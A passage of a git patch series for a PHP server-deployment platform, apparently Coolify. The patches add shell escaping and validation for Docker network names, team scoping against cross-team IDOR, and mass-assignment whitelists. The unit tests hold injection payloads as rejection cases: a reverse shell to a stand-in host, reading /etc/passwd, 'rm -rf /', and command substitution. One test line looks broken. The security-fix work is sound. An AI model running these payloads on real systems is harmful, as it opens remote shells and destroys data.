+ $safe = escapeshellarg($network);
return [
- "echo 'Ensuring network $network exists...'",
- "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --attachable $network",
+ "echo 'Ensuring network {$safe} exists...'",
+ "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --attachable {$safe}",
];
});
}
diff --git a/tests/Unit/DockerNetworkInjectionTest.php b/tests/Unit/DockerNetworkInjectionTest.php
new file mode 100644
index 000000000..b3ca4ac60
--- /dev/null
+++ b/tests/Unit/DockerNetworkInjectionTest.php
@@ -0,0 +1,48 @@
+network = $network;
+})->with([
+ 'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
+ 'pipe injection' => 'net|cat /etc/passwd',
+ 'dollar injection' => 'net$(whoami)',
+ 'backtick injection' => 'net`id`',
+ 'space injection' => 'net work',
+])->throws(InvalidArgumentException::class);
+
+it('StandaloneDocker accepts valid network names', function (string $network) {
+ $model = new StandaloneDocker;
+ $model->network = $network;
+
+ expect($model->network)->toBe($network);
+})->with([
+ 'simple' => 'mynetwork',
+ 'with hyphen' => 'my-network',
+ 'with underscore' => 'my_network',
+ 'with dot' => 'my.network',
+ 'alphanumeric' => 'network123',
+]);
+
+it('SwarmDocker rejects network names with shell metacharacters', function (string $network) {
+ $model = new SwarmDocker;
+ $model->network = $network;
+})->with([
+ 'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
+ 'pipe injection' => 'net|cat /etc/passwd',
+ 'dollar injection' => 'net$(whoami)',
+])->throws(InvalidArgumentException::class);
+
+it('SwarmDocker accepts valid network names', function (string $network) {
+ $model = new SwarmDocker;
+ $model->network = $network;
+
+ expect($model->network)->toBe($network);
+})->with([
+ 'simple' => 'mynetwork',
+ 'with hyphen' => 'my-network',
+ 'with underscore' => 'my_network',
+]);
diff --git a/tests/Unit/ValidationPatternsTest.php b/tests/Unit/ValidationPatternsTest.php
index 0da8f9a4d..9ecffe46d 100644
--- a/tests/Unit/ValidationPatternsTest.php
+++ b/tests/Unit/ValidationPatternsTest.php
@@ -80,3 +80,53 @@
expect(mb_strlen($name))->toBeGreaterThanOrEqual(3)
->and(preg_match(ValidationPatterns::NAME_PATTERN, $name))->toBe(1);
});
+
+it('accepts valid Docker network names', function (string $network) {
+ expect(ValidationPatterns::isValidDockerNetwork($network))->toBeTrue();
+})->with([
+ 'simple name' => 'mynetwork',
+ 'with hyphen' => 'my-network',
+ 'with underscore' => 'my_network',
+ 'with dot' => 'my.network',
+ 'cuid2 format' => 'ck8s2z1x0000001mhg3f9d0g1',
+ 'alphanumeric' => 'network123',
+ 'starts with number' => '1network',
+ 'complex valid' => 'coolify-proxy.net_2',
+]);
+
+it('rejects Docker network names with shell metacharacters', function (string $network) {
+ expect(ValidationPatterns::isValidDockerNetwork($network))->toBeFalse();
+})->with([
+ 'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
+ 'pipe injection' => 'net|cat /etc/passwd',
+ 'dollar injection' => 'net$(whoami)',
+ 'backtick injection' => 'net`id`',
+ 'ampersand injection' => 'net&rm -rf /',
+ 'space' => 'net work',
+ 'newline' => "net\nwork",
+ 'starts with dot' => '.network',
+ 'starts with hyphen' => '-network',
+ 'slash' => 'net/work',
+ 'backslash' => 'net\\work',
+ 'empty string' => '',
+ 'single quotes' => "net'work",
+ 'double quotes' => 'net"work',
+ 'greater than' => 'net>work',
+ 'less than' => 'nettoContain('required')
+ ->toContain('string')
+ ->toContain('max:255')
+ ->toContain('regex:'.ValidationPatterns::DOCKER_NETWORK_PATTERN);
+});
+
+it('generates nullable dockerNetworkRules when not required', function () {
+ $rules = ValidationPatterns::dockerNetworkRules(required: false);
+
+ expect($rules)->toContain('nullable')
+ ->not->toContain('required');
+});
From e36622fdfb60df2bb733c37d6f0f4f7ac8b61486 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:29:08 +0100
Subject: [PATCH 098/168] refactor: scope server and project queries to current
team
Ensure Server and Project lookups in Livewire components and API
controllers use team-scoped queries (ownedByCurrentTeam / whereTeamId)
instead of unscoped find/where calls. This enforces consistent
multi-tenant isolation across all user-facing code paths.
Co-Authored-By: Claude Opus 4.6
---
app/Http/Controllers/Api/DeployController.php | 2 +-
app/Livewire/Boarding/Index.php | 6 +-
app/Livewire/GlobalSearch.php | 4 +-
app/Livewire/Project/CloneMe.php | 2 +-
app/Livewire/Project/DeleteProject.php | 4 +-
app/Livewire/Project/New/DockerCompose.php | 2 +-
app/Livewire/Project/New/DockerImage.php | 2 +-
.../Project/New/GithubPrivateRepository.php | 2 +-
.../New/GithubPrivateRepositoryDeployKey.php | 2 +-
.../Project/New/PublicGitRepository.php | 2 +-
app/Livewire/Project/New/Select.php | 4 +-
app/Livewire/Project/New/SimpleDockerfile.php | 2 +-
.../CrossTeamIdorServerProjectTest.php | 182 ++++++++++++++++++
13 files changed, 199 insertions(+), 17 deletions(-)
create mode 100644 tests/Feature/CrossTeamIdorServerProjectTest.php
diff --git a/app/Http/Controllers/Api/DeployController.php b/app/Http/Controllers/Api/DeployController.php
index 85d532f62..e490f3b0c 100644
--- a/app/Http/Controllers/Api/DeployController.php
+++ b/app/Http/Controllers/Api/DeployController.php
@@ -250,7 +250,7 @@ public function cancel_deployment(Request $request)
]);
// Get the server
- $server = Server::find($build_server_id);
+ $server = Server::whereTeamId($teamId)->find($build_server_id);
if ($server) {
// Add cancellation log entry
diff --git a/app/Livewire/Boarding/Index.php b/app/Livewire/Boarding/Index.php
index 0f6f45d83..d7fa67b7b 100644
--- a/app/Livewire/Boarding/Index.php
+++ b/app/Livewire/Boarding/Index.php
@@ -121,7 +121,7 @@ public function mount()
}
if ($this->selectedExistingServer) {
- $this->createdServer = Server::find($this->selectedExistingServer);
+ $this->createdServer = Server::ownedByCurrentTeam()->find($this->selectedExistingServer);
if ($this->createdServer) {
$this->serverPublicKey = $this->createdServer->privateKey->getPublicKey();
$this->updateServerDetails();
@@ -145,7 +145,7 @@ public function mount()
}
if ($this->selectedProject) {
- $this->createdProject = Project::find($this->selectedProject);
+ $this->createdProject = Project::ownedByCurrentTeam()->find($this->selectedProject);
if (! $this->createdProject) {
$this->projects = Project::ownedByCurrentTeam(['name'])->get();
}
@@ -431,7 +431,7 @@ public function getProjects()
public function selectExistingProject()
{
- $this->createdProject = Project::find($this->selectedProject);
+ $this->createdProject = Project::ownedByCurrentTeam()->find($this->selectedProject);
$this->currentState = 'create-resource';
}
diff --git a/app/Livewire/GlobalSearch.php b/app/Livewire/GlobalSearch.php
index f910110dc..154748b47 100644
--- a/app/Livewire/GlobalSearch.php
+++ b/app/Livewire/GlobalSearch.php
@@ -1203,7 +1203,7 @@ public function selectServer($serverId, $shouldProgress = true)
public function loadDestinations()
{
$this->loadingDestinations = true;
- $server = Server::find($this->selectedServerId);
+ $server = Server::ownedByCurrentTeam()->find($this->selectedServerId);
if (! $server) {
$this->loadingDestinations = false;
@@ -1280,7 +1280,7 @@ public function selectProject($projectUuid, $shouldProgress = true)
public function loadEnvironments()
{
$this->loadingEnvironments = true;
- $project = Project::where('uuid', $this->selectedProjectUuid)->first();
+ $project = Project::ownedByCurrentTeam()->where('uuid', $this->selectedProjectUuid)->first();
if (! $project) {
$this->loadingEnvironments = false;
diff --git a/app/Livewire/Project/CloneMe.php b/app/Livewire/Project/CloneMe.php
index 3b3e42619..e9184a154 100644
--- a/app/Livewire/Project/CloneMe.php
+++ b/app/Livewire/Project/CloneMe.php
@@ -54,7 +54,7 @@ protected function messages(): array
public function mount($project_uuid)
{
$this->project_uuid = $project_uuid;
- $this->project = Project::where('uuid', $project_uuid)->firstOrFail();
+ $this->project = Project::ownedByCurrentTeam()->where('uuid', $project_uuid)->firstOrFail();
$this->environment = $this->project->environments->where('uuid', $this->environment_uuid)->first();
$this->project_id = $this->project->id;
$this->servers = currentTeam()
diff --git a/app/Livewire/Project/DeleteProject.php b/app/Livewire/Project/DeleteProject.php
index a018046fd..d95041c2d 100644
--- a/app/Livewire/Project/DeleteProject.php
+++ b/app/Livewire/Project/DeleteProject.php
@@ -21,7 +21,7 @@ class DeleteProject extends Component
public function mount()
{
$this->parameters = get_route_parameters();
- $this->projectName = Project::findOrFail($this->project_id)->name;
+ $this->projectName = Project::ownedByCurrentTeam()->findOrFail($this->project_id)->name;
}
public function delete()
@@ -29,7 +29,7 @@ public function delete()
$this->validate([
'project_id' => 'required|int',
]);
- $project = Project::findOrFail($this->project_id);
+ $project = Project::ownedByCurrentTeam()->findOrFail($this->project_id);
$this->authorize('delete', $project);
if ($project->isEmpty()) {
diff --git a/app/Livewire/Project/New/DockerCompose.php b/app/Livewire/Project/New/DockerCompose.php
index 634a012c0..5732e0cd5 100644
--- a/app/Livewire/Project/New/DockerCompose.php
+++ b/app/Livewire/Project/New/DockerCompose.php
@@ -41,7 +41,7 @@ public function submit()
// Validate for command injection BEFORE saving to database
validateDockerComposeForInjection($this->dockerComposeRaw);
- $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+ $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
$environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
$destination_uuid = $this->query['destination'];
diff --git a/app/Livewire/Project/New/DockerImage.php b/app/Livewire/Project/New/DockerImage.php
index 8aff83153..545afdd0b 100644
--- a/app/Livewire/Project/New/DockerImage.php
+++ b/app/Livewire/Project/New/DockerImage.php
@@ -121,7 +121,7 @@ public function submit()
}
$destination_class = $destination->getMorphClass();
- $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+ $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
$environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
// Append @sha256 to image name if using digest and not already present
diff --git a/app/Livewire/Project/New/GithubPrivateRepository.php b/app/Livewire/Project/New/GithubPrivateRepository.php
index 61ae0e151..d1993b4ac 100644
--- a/app/Livewire/Project/New/GithubPrivateRepository.php
+++ b/app/Livewire/Project/New/GithubPrivateRepository.php
@@ -185,7 +185,7 @@ public function submit()
}
$destination_class = $destination->getMorphClass();
- $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+ $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
$environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
$application = Application::create([
diff --git a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
index e46ad7d78..30c8ded4f 100644
--- a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
+++ b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
@@ -144,7 +144,7 @@ public function submit()
// Note: git_repository has already been validated and transformed in get_git_source()
// It may now be in SSH format (git@host:repo.git) which is valid for deploy keys
- $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+ $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
$environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
if ($this->git_source === 'other') {
$application_init = [
diff --git a/app/Livewire/Project/New/PublicGitRepository.php b/app/Livewire/Project/New/PublicGitRepository.php
index 3df31a6a3..731584edf 100644
--- a/app/Livewire/Project/New/PublicGitRepository.php
+++ b/app/Livewire/Project/New/PublicGitRepository.php
@@ -278,7 +278,7 @@ public function submit()
}
$destination_class = $destination->getMorphClass();
- $project = Project::where('uuid', $project_uuid)->first();
+ $project = Project::ownedByCurrentTeam()->where('uuid', $project_uuid)->first();
$environment = $project->load(['environments'])->environments->where('uuid', $environment_uuid)->first();
if ($this->build_pack === 'dockercompose' && isDev() && $this->new_compose_services) {
diff --git a/app/Livewire/Project/New/Select.php b/app/Livewire/Project/New/Select.php
index c5dc13987..165e4b59e 100644
--- a/app/Livewire/Project/New/Select.php
+++ b/app/Livewire/Project/New/Select.php
@@ -65,7 +65,7 @@ public function mount()
$this->existingPostgresqlUrl = 'postgres://coolify:password@coolify-db:5432';
}
$projectUuid = data_get($this->parameters, 'project_uuid');
- $project = Project::whereUuid($projectUuid)->firstOrFail();
+ $project = Project::ownedByCurrentTeam()->whereUuid($projectUuid)->firstOrFail();
$this->environments = $project->environments;
$this->selectedEnvironment = $this->environments->where('uuid', data_get($this->parameters, 'environment_uuid'))->firstOrFail()->name;
@@ -79,7 +79,7 @@ public function mount()
$this->type = $queryType;
$this->server_id = $queryServerId;
$this->destination_uuid = $queryDestination;
- $this->server = Server::find($queryServerId);
+ $this->server = Server::ownedByCurrentTeam()->find($queryServerId);
$this->current_step = 'select-postgresql-type';
}
} catch (\Exception $e) {
diff --git a/app/Livewire/Project/New/SimpleDockerfile.php b/app/Livewire/Project/New/SimpleDockerfile.php
index 9cc4fbbe2..a87da7884 100644
--- a/app/Livewire/Project/New/SimpleDockerfile.php
+++ b/app/Livewire/Project/New/SimpleDockerfile.php
@@ -45,7 +45,7 @@ public function submit()
}
$destination_class = $destination->getMorphClass();
- $project = Project::where('uuid', $this->parameters['project_uuid'])->first();
+ $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->first();
$environment = $project->load(['environments'])->environments->where('uuid', $this->parameters['environment_uuid'])->first();
$port = get_port_from_dockerfile($this->dockerfile);
diff --git a/tests/Feature/CrossTeamIdorServerProjectTest.php b/tests/Feature/CrossTeamIdorServerProjectTest.php
new file mode 100644
index 000000000..173dae5cd
--- /dev/null
+++ b/tests/Feature/CrossTeamIdorServerProjectTest.php
@@ -0,0 +1,182 @@
+userA = User::factory()->create();
+ $this->teamA = Team::factory()->create();
+ $this->userA->teams()->attach($this->teamA, ['role' => 'owner']);
+
+ $this->serverA = Server::factory()->create(['team_id' => $this->teamA->id]);
+ $this->projectA = Project::factory()->create(['team_id' => $this->teamA->id]);
+ $this->environmentA = Environment::factory()->create(['project_id' => $this->projectA->id]);
+
+ // Victim: Team B
+ $this->userB = User::factory()->create();
+ $this->teamB = Team::factory()->create();
+ $this->userB->teams()->attach($this->teamB, ['role' => 'owner']);
+
+ $this->serverB = Server::factory()->create(['team_id' => $this->teamB->id]);
+ $this->projectB = Project::factory()->create(['team_id' => $this->teamB->id]);
+ $this->environmentB = Environment::factory()->create(['project_id' => $this->projectB->id]);
+
+ // Act as attacker (Team A)
+ $this->actingAs($this->userA);
+ session(['currentTeam' => $this->teamA]);
+});
+
+describe('Boarding Server IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+ test('boarding mount cannot load server from another team via selectedExistingServer', function () {
+ $component = Livewire::test(BoardingIndex::class, [
+ 'selectedServerType' => 'remote',
+ 'selectedExistingServer' => $this->serverB->id,
+ ]);
+
+ // The server from Team B should NOT be loaded
+ expect($component->get('createdServer'))->toBeNull();
+ });
+
+ test('boarding mount can load own team server via selectedExistingServer', function () {
+ $component = Livewire::test(BoardingIndex::class, [
+ 'selectedServerType' => 'remote',
+ 'selectedExistingServer' => $this->serverA->id,
+ ]);
+
+ // Own team server should load successfully
+ expect($component->get('createdServer'))->not->toBeNull();
+ expect($component->get('createdServer')->id)->toBe($this->serverA->id);
+ });
+});
+
+describe('Boarding Project IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+ test('boarding mount cannot load project from another team via selectedProject', function () {
+ $component = Livewire::test(BoardingIndex::class, [
+ 'selectedProject' => $this->projectB->id,
+ ]);
+
+ // The project from Team B should NOT be loaded
+ expect($component->get('createdProject'))->toBeNull();
+ });
+
+ test('boarding selectExistingProject cannot load project from another team', function () {
+ $component = Livewire::test(BoardingIndex::class)
+ ->set('selectedProject', $this->projectB->id)
+ ->call('selectExistingProject');
+
+ expect($component->get('createdProject'))->toBeNull();
+ });
+
+ test('boarding selectExistingProject can load own team project', function () {
+ $component = Livewire::test(BoardingIndex::class)
+ ->set('selectedProject', $this->projectA->id)
+ ->call('selectExistingProject');
+
+ expect($component->get('createdProject'))->not->toBeNull();
+ expect($component->get('createdProject')->id)->toBe($this->projectA->id);
+ });
+});
+
+describe('GlobalSearch Server IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+ test('loadDestinations cannot access server from another team', function () {
+ $component = Livewire::test(GlobalSearch::class)
+ ->set('selectedServerId', $this->serverB->id)
+ ->call('loadDestinations');
+
+ // Should dispatch error because server is not found (team-scoped)
+ $component->assertDispatched('error');
+ });
+});
+
+describe('GlobalSearch Project IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+ test('loadEnvironments cannot access project from another team', function () {
+ $component = Livewire::test(GlobalSearch::class)
+ ->set('selectedProjectUuid', $this->projectB->uuid)
+ ->call('loadEnvironments');
+
+ // Should not load environments from another team's project
+ expect($component->get('availableEnvironments'))->toBeEmpty();
+ });
+});
+
+describe('DeleteProject IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+ test('cannot mount DeleteProject with project from another team', function () {
+ // Should throw ModelNotFoundException (404) because team-scoped query won't find it
+ Livewire::test(DeleteProject::class, ['project_id' => $this->projectB->id])
+ ->assertStatus(500); // findOrFail throws ModelNotFoundException
+ })->throws(\Illuminate\Database\Eloquent\ModelNotFoundException::class);
+
+ test('can mount DeleteProject with own team project', function () {
+ $component = Livewire::test(DeleteProject::class, ['project_id' => $this->projectA->id]);
+
+ expect($component->get('projectName'))->toBe($this->projectA->name);
+ });
+});
+
+describe('CloneMe Project IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+ test('cannot mount CloneMe with project UUID from another team', function () {
+ // Should throw ModelNotFoundException because team-scoped query won't find it
+ Livewire::test(CloneMe::class, [
+ 'project_uuid' => $this->projectB->uuid,
+ 'environment_uuid' => $this->environmentB->uuid,
+ ]);
+ })->throws(\Illuminate\Database\Eloquent\ModelNotFoundException::class);
+
+ test('can mount CloneMe with own team project UUID', function () {
+ $component = Livewire::test(CloneMe::class, [
+ 'project_uuid' => $this->projectA->uuid,
+ 'environment_uuid' => $this->environmentA->uuid,
+ ]);
+
+ expect($component->get('project_id'))->toBe($this->projectA->id);
+ });
+});
+
+describe('DeployController API Server IDOR (GHSA-qfcc-2fm3-9q42)', function () {
+ test('deploy cancel API cannot access build server from another team', function () {
+ // Create a deployment queue entry that references Team B's server as build_server
+ $application = \App\Models\Application::factory()->create([
+ 'environment_id' => $this->environmentA->id,
+ 'destination_id' => StandaloneDocker::factory()->create(['server_id' => $this->serverA->id])->id,
+ 'destination_type' => StandaloneDocker::class,
+ ]);
+
+ $deployment = \App\Models\ApplicationDeploymentQueue::create([
+ 'application_id' => $application->id,
+ 'deployment_uuid' => 'test-deploy-' . fake()->uuid(),
+ 'server_id' => $this->serverA->id,
+ 'build_server_id' => $this->serverB->id, // Cross-team build server
+ 'status' => \App\Enums\ApplicationDeploymentStatus::IN_PROGRESS->value,
+ ]);
+
+ $token = $this->userA->createToken('test-token', ['*']);
+
+ $response = $this->withHeaders([
+ 'Authorization' => 'Bearer ' . $token->plainTextToken,
+ ])->deleteJson("/api/v1/deployments/{$deployment->deployment_uuid}");
+
+ // The cancellation should proceed but the build_server should NOT be found
+ // (team-scoped query returns null for Team B's server)
+ // The deployment gets cancelled but no remote process runs on the wrong server
+ $response->assertOk();
+
+ // Verify the deployment was cancelled
+ $deployment->refresh();
+ expect($deployment->status)->toBe(
+ \App\Enums\ApplicationDeploymentStatus::CANCELLED_BY_USER->value
+ );
+ });
+});
From 67a4fcc2ab8134f905f32fab8057b3c11e18fbb2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:32:57 +0100
Subject: [PATCH 099/168] fix: add mass assignment protection to models
Replace $guarded = [] with explicit $fillable whitelists across all
models. Update controllers to use request->only($allowedFields) when
assigning request data. Switch Livewire components to forceFill() for
explicit mass assignment. Add integration tests for mass assignment
protection.
---
.../Api/ApplicationsController.php | 14 +-
.../Controllers/Api/DatabasesController.php | 16 +-
.../Controllers/Api/SecurityController.php | 7 +-
app/Livewire/Project/CloneMe.php | 34 ++--
.../Project/Shared/ResourceOperations.php | 59 +++---
app/Models/Application.php | 109 +++++++++--
app/Models/Server.php | 2 -
app/Models/Service.php | 14 +-
app/Models/StandaloneClickhouse.php | 26 ++-
app/Models/StandaloneDragonfly.php | 25 ++-
app/Models/StandaloneKeydb.php | 26 ++-
app/Models/StandaloneMariadb.php | 27 ++-
app/Models/StandaloneMongodb.php | 26 ++-
app/Models/StandaloneMysql.php | 27 ++-
app/Models/StandalonePostgresql.php | 29 ++-
app/Models/StandaloneRedis.php | 24 ++-
app/Models/Team.php | 9 +-
app/Models/User.php | 19 +-
bootstrap/helpers/applications.php | 13 +-
.../Feature/MassAssignmentProtectionTest.php | 182 ++++++++++++++++++
20 files changed, 593 insertions(+), 95 deletions(-)
create mode 100644 tests/Feature/MassAssignmentProtectionTest.php
diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index ad1f50ea2..82d662177 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -1158,7 +1158,7 @@ private function create_application(Request $request, $type)
$application = new Application;
removeUnnecessaryFieldsFromRequest($request);
- $application->fill($request->all());
+ $application->fill($request->only($allowedFields));
$dockerComposeDomainsJson = collect();
if ($request->has('docker_compose_domains')) {
$dockerComposeDomains = collect($request->docker_compose_domains);
@@ -1385,7 +1385,7 @@ private function create_application(Request $request, $type)
$application = new Application;
removeUnnecessaryFieldsFromRequest($request);
- $application->fill($request->all());
+ $application->fill($request->only($allowedFields));
$dockerComposeDomainsJson = collect();
if ($request->has('docker_compose_domains')) {
@@ -1585,7 +1585,7 @@ private function create_application(Request $request, $type)
$application = new Application;
removeUnnecessaryFieldsFromRequest($request);
- $application->fill($request->all());
+ $application->fill($request->only($allowedFields));
$dockerComposeDomainsJson = collect();
if ($request->has('docker_compose_domains')) {
@@ -1772,7 +1772,7 @@ private function create_application(Request $request, $type)
}
$application = new Application;
- $application->fill($request->all());
+ $application->fill($request->only($allowedFields));
$application->fqdn = $fqdn;
$application->ports_exposes = $port;
$application->build_pack = 'dockerfile';
@@ -1884,7 +1884,7 @@ private function create_application(Request $request, $type)
$application = new Application;
removeUnnecessaryFieldsFromRequest($request);
- $application->fill($request->all());
+ $application->fill($request->only($allowedFields));
$application->fqdn = $fqdn;
$application->build_pack = 'dockerimage';
$application->destination_id = $destination->id;
@@ -2000,7 +2000,7 @@ private function create_application(Request $request, $type)
$service = new Service;
removeUnnecessaryFieldsFromRequest($request);
- $service->fill($request->all());
+ $service->fill($request->only($allowedFields));
$service->docker_compose_raw = $dockerComposeRaw;
$service->environment_id = $environment->id;
@@ -2760,7 +2760,7 @@ public function update_by_uuid(Request $request)
removeUnnecessaryFieldsFromRequest($request);
- $data = $request->all();
+ $data = $request->only($allowedFields);
if ($requestHasDomains && $server->isProxyShouldRun()) {
data_set($data, 'fqdn', $domains);
}
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 660ed4529..3fd1b8db8 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -1740,7 +1740,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
}
$request->offsetSet('postgres_conf', $postgresConf);
}
- $database = create_standalone_postgresql($environment->id, $destination->uuid, $request->all());
+ $database = create_standalone_postgresql($environment->id, $destination->uuid, $request->only($allowedFields));
if ($instantDeploy) {
StartDatabase::dispatch($database);
}
@@ -1795,7 +1795,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
}
$request->offsetSet('mariadb_conf', $mariadbConf);
}
- $database = create_standalone_mariadb($environment->id, $destination->uuid, $request->all());
+ $database = create_standalone_mariadb($environment->id, $destination->uuid, $request->only($allowedFields));
if ($instantDeploy) {
StartDatabase::dispatch($database);
}
@@ -1854,7 +1854,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
}
$request->offsetSet('mysql_conf', $mysqlConf);
}
- $database = create_standalone_mysql($environment->id, $destination->uuid, $request->all());
+ $database = create_standalone_mysql($environment->id, $destination->uuid, $request->only($allowedFields));
if ($instantDeploy) {
StartDatabase::dispatch($database);
}
@@ -1910,7 +1910,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
}
$request->offsetSet('redis_conf', $redisConf);
}
- $database = create_standalone_redis($environment->id, $destination->uuid, $request->all());
+ $database = create_standalone_redis($environment->id, $destination->uuid, $request->only($allowedFields));
if ($instantDeploy) {
StartDatabase::dispatch($database);
}
@@ -1947,7 +1947,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
}
removeUnnecessaryFieldsFromRequest($request);
- $database = create_standalone_dragonfly($environment->id, $destination->uuid, $request->all());
+ $database = create_standalone_dragonfly($environment->id, $destination->uuid, $request->only($allowedFields));
if ($instantDeploy) {
StartDatabase::dispatch($database);
}
@@ -1996,7 +1996,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
}
$request->offsetSet('keydb_conf', $keydbConf);
}
- $database = create_standalone_keydb($environment->id, $destination->uuid, $request->all());
+ $database = create_standalone_keydb($environment->id, $destination->uuid, $request->only($allowedFields));
if ($instantDeploy) {
StartDatabase::dispatch($database);
}
@@ -2032,7 +2032,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
], 422);
}
removeUnnecessaryFieldsFromRequest($request);
- $database = create_standalone_clickhouse($environment->id, $destination->uuid, $request->all());
+ $database = create_standalone_clickhouse($environment->id, $destination->uuid, $request->only($allowedFields));
if ($instantDeploy) {
StartDatabase::dispatch($database);
}
@@ -2090,7 +2090,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
}
$request->offsetSet('mongo_conf', $mongoConf);
}
- $database = create_standalone_mongodb($environment->id, $destination->uuid, $request->all());
+ $database = create_standalone_mongodb($environment->id, $destination->uuid, $request->only($allowedFields));
if ($instantDeploy) {
StartDatabase::dispatch($database);
}
diff --git a/app/Http/Controllers/Api/SecurityController.php b/app/Http/Controllers/Api/SecurityController.php
index e7b36cb9a..2c62928c2 100644
--- a/app/Http/Controllers/Api/SecurityController.php
+++ b/app/Http/Controllers/Api/SecurityController.php
@@ -4,6 +4,7 @@
use App\Http\Controllers\Controller;
use App\Models\PrivateKey;
+use Illuminate\Http\JsonResponse;
use Illuminate\Http\Request;
use OpenApi\Attributes as OA;
@@ -176,7 +177,7 @@ public function create_key(Request $request)
return invalidTokenResponse();
}
$return = validateIncomingRequest($request);
- if ($return instanceof \Illuminate\Http\JsonResponse) {
+ if ($return instanceof JsonResponse) {
return $return;
}
$validator = customApiValidator($request->all(), [
@@ -300,7 +301,7 @@ public function update_key(Request $request)
return invalidTokenResponse();
}
$return = validateIncomingRequest($request);
- if ($return instanceof \Illuminate\Http\JsonResponse) {
+ if ($return instanceof JsonResponse) {
return $return;
}
@@ -330,7 +331,7 @@ public function update_key(Request $request)
'message' => 'Private Key not found.',
], 404);
}
- $foundKey->update($request->all());
+ $foundKey->update($request->only($allowedFields));
return response()->json(serializeApiResponse([
'uuid' => $foundKey->uuid,
diff --git a/app/Livewire/Project/CloneMe.php b/app/Livewire/Project/CloneMe.php
index 3b3e42619..3b04c3b7f 100644
--- a/app/Livewire/Project/CloneMe.php
+++ b/app/Livewire/Project/CloneMe.php
@@ -139,7 +139,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => $uuid,
'status' => 'exited',
'started_at' => null,
@@ -187,7 +187,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'name' => $newName,
'resource_id' => $newDatabase->id,
]);
@@ -216,7 +216,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'resource_id' => $newDatabase->id,
]);
$newStorage->save();
@@ -229,7 +229,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => $uuid,
'database_id' => $newDatabase->id,
'database_type' => $newDatabase->getMorphClass(),
@@ -247,7 +247,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill($payload);
+ ])->forceFill($payload);
$newEnvironmentVariable->save();
}
}
@@ -258,7 +258,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => $uuid,
'environment_id' => $environment->id,
'destination_id' => $this->selectedDestination,
@@ -276,7 +276,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => (string) new Cuid2,
'service_id' => $newService->id,
'team_id' => currentTeam()->id,
@@ -290,7 +290,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'resourceable_id' => $newService->id,
'resourceable_type' => $newService->getMorphClass(),
]);
@@ -298,9 +298,9 @@ public function clone(string $type)
}
foreach ($newService->applications() as $application) {
- $application->update([
+ $application->forceFill([
'status' => 'exited',
- ]);
+ ])->save();
$persistentVolumes = $application->persistentStorages()->get();
foreach ($persistentVolumes as $volume) {
@@ -315,7 +315,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'name' => $newName,
'resource_id' => $application->id,
]);
@@ -344,7 +344,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'resource_id' => $application->id,
]);
$newStorage->save();
@@ -352,9 +352,9 @@ public function clone(string $type)
}
foreach ($newService->databases() as $database) {
- $database->update([
+ $database->forceFill([
